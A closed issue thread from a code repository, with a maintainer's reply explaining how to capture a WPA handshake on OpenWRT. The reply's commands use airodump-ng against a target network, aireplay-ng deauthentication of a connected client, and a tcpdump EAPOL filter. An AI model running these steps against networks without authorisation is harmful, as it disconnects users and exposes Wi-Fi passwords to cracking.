Closed atdx closed 2 weeks ago
the issues in this repository are about this development, but I will answer you anyway.
To capture a WPA handshake effectively on an OpenWRT system, you need to use suitable tools and ensure ethical practices, strictly operating within legal boundaries. Here's a summarized guide in English for performing this task on OpenWRT:
Compatible Network Interface: Ensure your network adapter supports monitor mode, crucial for capturing wireless traffic.
Packet Capture Software: Although Aircrack-ng is commonly used on various Linux distributions, ensure it’s compatible with OpenWRT or use alternative tools available for OpenWRT.
Set Network Interface to Monitor Mode:
iwconfig
or ifconfig
.ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
iwconfig
.Capture Traffic with Airodump-ng (or equivalent):
airodump-ng wlan0
Focus on the Target Network:
airodump-ng -c [channel] --bssid [BSSID] -w [output_file] wlan0
[channel]
, [BSSID]
, and [output_file]
with the respective values.Deauthenticate a Client:
aireplay-ng -0 2 -a [BSSID] -c [client] wlan0
[client]
is the MAC address of a connected client.Verify the Handshake Capture:
and to leave capturing while deauthenticate
tcpdump -i wlan0 'type mgt subtype beacon and ether proto 0x888e' -w handshake.cap
How to capture handshake using tcpdump?